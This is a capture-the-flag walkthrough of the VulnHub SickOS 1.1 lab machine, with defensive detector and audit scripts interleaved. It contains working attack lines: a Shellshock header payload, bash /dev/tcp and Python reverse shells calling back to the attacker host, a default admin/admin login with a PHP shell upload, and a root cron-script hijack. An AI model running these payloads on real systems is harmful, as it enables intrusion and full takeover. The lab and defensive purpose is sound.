VulnHub SickOS 1.1 notes
SickOS 1.1
Deploying from the OVF failed. Creating a new VM and adding the existing hard disk instead works.
Service enumeration
# nmap -p- 10.10.10.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 23:25 EDT
Nmap scan report for 10.10.10.9
Host is up (0.00074s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 08:00:27:3C:37:E6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 118.00 seconds

# nmap -p22,3128,8080 -sV -version-all 10.10.10.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 23:28 EDT
Nmap scan report for 10.10.10.9
Host is up (0.00086s latency).

PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open   http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
MAC Address: 08:00:27:3C:37:E6 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.47 seconds
Points of interest
- [port 22 ssh] OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0): there's probably nothing here anyway
- [port 3128 http-proxy] Squid http proxy 3.1.19: I forgot this was a proxy, which actually cost me some effort
Details
[port 22 ssh] OpenSSH 5.9p1
Nothing in particular. Couldn't find anything.
[port 3128 http-proxy] Squid http proxy 3.1.19
Doesn't look like there's an exploit for Squid itself?
All access to the SickOS 1.1 web services has to go through the proxy on port 3128.
# nikto -h 10.10.10.9 -useproxy 10.10.10.9:3128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.9
+ Target Hostname:    10.10.10.9
+ Target Port:        80
+ Proxy:              10.10.10.9:3128
+ Start Time:         2020-05-02 11:33:08 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec 4 19:35:02 2015
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 8674 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2020-05-02 11:33:58 (GMT-4) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

# dirb http://10.10.10.9 -p 10.10.10.9:3128

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat May 2 11:43:27 2020
URL_BASE: http://10.10.10.9/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: 10.10.10.9:3128

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.9/ ----
+ http://10.10.10.9/cgi-bin/ (CODE:403|SIZE:286)
+ http://10.10.10.9/connect (CODE:200|SIZE:109)
+ http://10.10.10.9/index (CODE:200|SIZE:21)
+ http://10.10.10.9/index.php (CODE:200|SIZE:21)
+ http://10.10.10.9/robots (CODE:200|SIZE:45)
+ http://10.10.10.9/robots.txt (CODE:200|SIZE:45)
+ http://10.10.10.9/server-status (CODE:403|SIZE:291)

-----------------
END_TIME: Sat May 2 11:43:36 2020
DOWNLOADED: 4612 - FOUND: 7
Plenty of interesting things here.
Found something that looks promising for the Apache + PHP 5.3.10 combination:
# searchsploit apache php 5.3
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner            | exploits/php/remote/29316.py
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution              | exploits/php/remote/29290.c
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
The exploit code as-is apparently wasn't general enough to work when a proxy is in the way?
On CVE-2014-6271 and CVE-2014-6278
Apparently there is something called Shellshock.
# curl --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status
{ "uptime": " 21:41:52 up 1:10, 0 users, load average: 0.00, 0.01, 0.05", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"}
In this case, querying /cgi-bin/status returns what looks like the output of a couple of commands.
Being able to inject OS commands here is Shellshock!
Also, dirb didn't pick up /cgi-bin/status, huh.
In short, there's a flaw in how bash processes something, and that processing can be subverted.
# curl -H "U: () { :;}; echo ; echo ;/bin/bash -c id;" --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status
uid=33(www-data) gid=33(www-data) groups=33(www-data)
In this case, whichever header you send to /cgi-bin/status, as long as it carries code that triggers the flaw, you get OS command injection.
window 1
# rlwrap nc -nlvp 443

window 2
# curl -H "U: () { :;}; echo ; echo ;/bin/bash -c bash -i >& /dev/tcp/10.10.10.3/443 0>&1;" --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status

window 1
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c "import pty;pty.spawn('/bin/bash')"
www-data@SickOs:/usr/lib/cgi-bin$
Reverse shell!
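Seen from the server side, the probe above is easy to spot: the CGI module exports every request header as an environment variable, and a vulnerable bash kept executing whatever followed a function definition ("() { ... }") found in such a variable. As an added example (not from the original write-up, and not any tool's code), here is a small detector run over a few constructed Apache access-log lines. It assumes a custom LogFormat that appends the User-Agent and the value of one extra request header after the usual fields; the log lines, IPs and timestamps are made up.

```python
import re

# Constructed sample of Apache access-log lines in an assumed custom LogFormat:
# the standard fields, then Referer, User-Agent and one extra header value,
# each in double quotes. The value on line 2 is the same probe the walkthrough
# sends with curl; line 4 is the same thing with extra whitespace.
SAMPLE_LOG = r'''
10.10.10.3 - - [02/May/2020:11:33:08 -0400] "GET /cgi-bin/status HTTP/1.1" 200 197 "-" "curl/7.68.0" "-"
10.10.10.3 - - [02/May/2020:11:35:01 -0400] "GET /cgi-bin/status HTTP/1.1" 200 63 "-" "curl/7.68.0" "() { :;}; echo ; echo ;/bin/bash -c id;"
10.10.10.3 - - [02/May/2020:11:36:10 -0400] "GET /index.php HTTP/1.1" 200 21 "-" "Mozilla/5.0" "-"
10.10.10.3 - - [02/May/2020:11:37:42 -0400] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "()  {  :; }; /bin/bash -c id" "-"
10.10.10.3 - - [02/May/2020:11:38:05 -0400] "GET /wolfcms/ HTTP/1.1" 200 3975 "-" "Mozilla/5.0 (X11) {}" "-"
'''

# An exported bash function starts with "()" followed by "{". A header value
# has no legitimate reason to start that way, so the prefix alone is the
# signal; the command after the closing brace varies and is not matched.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# "client ident user [timestamp] "METHOD path ..." -> method and path
REQUEST_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "(\S+) (\S+)')
# Every double-quoted field on the line (backslash escapes allowed inside).
QUOTED_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')


def is_shellshock_value(value):
    """True if a header value carries the bash function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def find_shellshock_attempts(log_text):
    """Scan log lines; return one finding per line with a matching quoted field."""
    findings = []
    for lineno, line in enumerate(log_text.strip().splitlines(), 1):
        req = REQUEST_RE.match(line)
        path = req.group(2) if req else None
        for field in QUOTED_RE.findall(line):
            if is_shellshock_value(field):
                findings.append({'line': lineno, 'path': path, 'value': field})
                break  # one finding per line is enough
    return findings


if __name__ == '__main__':
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print('line %d: %s <- %r' % (hit['line'], hit['path'], hit['value']))
```

Lines 2 and 4 are reported, both against /cgi-bin/status; the parenthesised User-Agent on line 5 is not, because the pattern requires an empty "()" pair. The same check fits a WAF rule or a Squid access log if the proxy logs headers. The fix is still the boring one: a bash with the 2014 patches applied, and no bash-backed CGI scripts under cgi-bin.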
robots.txt
Accessing it gives:
User-agent: *
Disallow: /
Dissalow: /wolfcms
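Note the misspelt third line. A crawler ignores a directive it does not recognise, so "Dissalow: /wolfcms" hides nothing from bots, yet it still hands the path to anyone who reads the file. As an added example (not part of the original write-up), here is a small checker that reports unknown directives and lists every path a robots.txt names; the file body is a constructed copy of the one above.

```python
# Directives from RFC 9309 plus the sitemap and crawl-delay extensions that
# major crawlers honour. Anything else is silently ignored by crawlers.
KNOWN_DIRECTIVES = {'user-agent', 'allow', 'disallow', 'sitemap', 'crawl-delay'}

# Constructed copy of the robots.txt served by the target above.
ROBOTS_TXT = """User-agent: *
Disallow: /
Dissalow: /wolfcms
"""


def check_robots(text):
    """Return (paths, problems).

    paths    - every site path the file names (whatever the directive), i.e.
               what the file discloses to a human reader
    problems - (line, kind, detail) for lines a crawler would not act on
    """
    paths, problems = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split('#', 1)[0].strip()      # comments start with '#'
        if not line:
            continue
        if ':' not in line:
            problems.append((lineno, 'not-a-directive', line))
            continue
        key, value = (part.strip() for part in line.split(':', 1))
        if key.lower() not in KNOWN_DIRECTIVES:
            problems.append((lineno, 'unknown-directive', key))
        if value.startswith('/') and value != '/':
            paths.append(value)
    return paths, problems


if __name__ == '__main__':
    found, bad = check_robots(ROBOTS_TXT)
    print('paths disclosed:', found)
    print('lines crawlers ignore:', bad)
```

For the file above the checker returns /wolfcms as a disclosed path and flags line 3 as an unknown directive. The takeaway for the site owner is that robots.txt is a politeness list, not access control; a directory that must stay private needs authentication, not a Disallow line.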
So let's look at this "wolfcms" thing.
Looks like some kind of homepage.
Found the login page at http://10.10.10.9/wolfcms/?/admin/login.
Unbelievably, you can log in with user: admin, password: admin.
Once logged in there is, conveniently, an "Upload file" button.
Nothing for it but to drop a reverse.php there.
window 1
# rlwrap nc -nlvp 8080

window 2
# curl --proxy 10.10.10.9:3128 http://10.10.10.9/wolfcms/public/reverse.php

window 1
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 23:34:51 up 3:03, 0 users, load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
After the reverse shell
connect.py
Look into connect.py, which had actually caught my eye in the earlier dirb run.
www-data@SickOs:/usr/lib/cgi-bin$ cd /var/www
cd /var/www
www-data@SickOs:/var/www$ ls
ls
connect.py  index.php  robots.txt  wolfcms
www-data@SickOs:/var/www$ cat connect.py
cat connect.py
#!/usr/bin/python
print "I Try to connect things very frequently\n"
print "You may want to try my services"
Connects frequently? More and more suspicious.
Looking at cron made it clear what this was about.
www-data@SickOs:/var/www$ ls -al /etc/cron.d
ls -al /etc/cron.d
total 20
drwxr-xr-x  2 root root 4096 Dec  5  2015 .
drwxr-xr-x 90 root root 4096 May  3 20:31 ..
-rw-r--r--  1 root root  102 Jun 20  2012 .placeholder
-rw-r--r--  1 root root   52 Dec  5  2015 automate
-rw-r--r--  1 root root  544 Jul  2  2015 php5
www-data@SickOs:/var/www$ cat /etc/cron.d/automate
cat /etc/cron.d/automate
* * * * * root /usr/bin/python /var/www/connect.py
So, by tampering with connect.py, which is executed every minute as root, we can get root.
attacker
# cat getroot.py
#! /usr/bin/env python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.3",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
root@kali:~/EXattack/Vulunhub/SickOS1-1# python -m SimpleHTTPServer 80

victim
www-data@SickOs:/tmp$ cd /tmp
cd /tmp
www-data@SickOs:/tmp$ wget 10.10.10.3/getroot.py
wget 10.10.10.3/getroot.py
--2020-05-03 23:12:22--  http://10.10.10.3/getroot.py
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 238 [text/plain]
Saving to: `getroot.py'

100%[======================================>] 238         --.-K/s   in 0s

2020-05-03 23:12:22 (17.2 MB/s) - `getroot.py' saved [238/238]

www-data@SickOs:/tmp$ cp /tmp/getroot.py /var/www/connect.py
cp /tmp/getroot.py /var/www/connect.py

attacker
# nc -nlvp 8080
Now just wait for connect.py to run.
Once it runs, we have root.
attacker
# id
uid=0(root) gid=0(root) groups=0(root)
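The root cause here is a single misconfiguration: a cron job that runs as root executes a file that the web server user can overwrite. That is a check worth automating on any box you administer. As an added example (not part of the original write-up, and not the machine's own code), the script below parses every file in /etc/cron.d (the default Debian/Ubuntu location used above; the path and the permission values in the test are assumptions), takes every absolute path mentioned in a root job's command line, and reports those that a non-root user could modify or replace, including through a writable parent directory.

```python
import os
import re
import stat

# cron.d / /etc/crontab syntax: five time fields (or an @shortcut such as
# @reboot), the user to run as, then the command line.
_JOB_RE = re.compile(
    r'^(?:(@\w+)|(\S+\s+\S+\s+\S+\s+\S+\s+\S+))\s+(\S+)\s+(.+?)\s*$')
_ENV_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_]*=')   # e.g. PATH=/usr/bin:/bin


def parse_cron_d_line(line):
    """Return (user, command) for a job line; None for blanks, comments, VAR=."""
    text = line.strip()
    if not text or text.startswith('#') or _ENV_RE.match(text):
        return None
    m = _JOB_RE.match(text)
    return (m.group(3), m.group(4)) if m else None


def absolute_paths(command):
    """Every absolute path in the command: interpreter, script and arguments."""
    return [tok for tok in re.split(r'[\s;|&]+', command) if tok.startswith('/')]


def writability_problems(mode, uid, parent_mode=None, parent_uid=None):
    """Reasons a non-root user could change a file that root's cron executes."""
    reasons = []
    if uid != 0:
        reasons.append('owner-not-root')
    if mode & stat.S_IWGRP:
        reasons.append('group-writable')
    if mode & stat.S_IWOTH:
        reasons.append('world-writable')
    if parent_mode is not None:
        # A writable parent directory (without the sticky bit) lets a user
        # delete and recreate the file even when the file itself is 0644.
        others_can_write = bool(parent_mode & (stat.S_IWGRP | stat.S_IWOTH))
        sticky = bool(parent_mode & stat.S_ISVTX)
        if parent_uid != 0 or (others_can_write and not sticky):
            reasons.append('parent-dir-writable')
    return reasons


def audit_cron_dir(cron_dir='/etc/cron.d'):
    """Walk cron_dir; report root jobs whose referenced files are unsafe."""
    findings = []
    for name in sorted(os.listdir(cron_dir)):
        cron_file = os.path.join(cron_dir, name)
        if not os.path.isfile(cron_file):
            continue
        with open(cron_file) as fh:
            for raw in fh:
                job = parse_cron_d_line(raw)
                if job is None or job[0] != 'root':
                    continue
                for target in absolute_paths(job[1]):
                    try:
                        st = os.stat(target)
                        pst = os.stat(os.path.dirname(target) or '/')
                    except OSError:
                        continue  # path missing; review such jobs by hand
                    reasons = writability_problems(
                        st.st_mode, st.st_uid, pst.st_mode, pst.st_uid)
                    if reasons:
                        findings.append({'cron_file': cron_file,
                                         'target': target, 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in audit_cron_dir():
        print('%s: %s (%s)' % (f['cron_file'], f['target'], ', '.join(f['reasons'])))
```

Run it as root so every target can be stat'ed. On the box above it would report /var/www/connect.py, since www-data was able to overwrite it; the interpreter /usr/bin/python is root-owned and passes. The remedy is equally plain: root jobs should only execute root-owned files in root-owned, non-writable directories, and a script that a web application needs to edit should never be on root's cron at all.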
Extras
# cd /root
# ls
a0216ea4d51874464078c618298b1367.txt
# cat a0216ea4d518^?
cat: a0216ea4d518: No such file or directory
# cat *.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying
There was also this:
# dirb http://10.10.10.9/wolfcms -p 10.10.10.9:3128

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun May 3 13:49:54 2020
URL_BASE: http://10.10.10.9/wolfcms/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: 10.10.10.9:3128

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.9/wolfcms/ ----
+ http://10.10.10.9/wolfcms/composer (CODE:200|SIZE:403)
+ http://10.10.10.9/wolfcms/config (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.10.9/wolfcms/docs/
+ http://10.10.10.9/wolfcms/favicon.ico (CODE:200|SIZE:894)
+ http://10.10.10.9/wolfcms/index (CODE:200|SIZE:3975)
+ http://10.10.10.9/wolfcms/index.php (CODE:200|SIZE:3975)
==> DIRECTORY: http://10.10.10.9/wolfcms/public/
+ http://10.10.10.9/wolfcms/robots (CODE:200|SIZE:0)
+ http://10.10.10.9/wolfcms/robots.txt (CODE:200|SIZE:0)

---- Entering directory: http://10.10.10.9/wolfcms/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.9/wolfcms/public/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun May 3 13:50:01 2020
DOWNLOADED: 4612 - FOUND: 7

# dirb http://10.10.10.9/cgi-bin -p 10.10.10.9:3128

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun May 3 13:50:10 2020
URL_BASE: http://10.10.10.9/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: 10.10.10.9:3128

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.9/cgi-bin/ ----
+ http://10.10.10.9/cgi-bin/status (CODE:200|SIZE:197)

-----------------
END_TIME: Sun May 3 13:50:17 2020
DOWNLOADED: 4612 - FOUND: 1
End
Look carefully at cron, http.conf and .htaccess.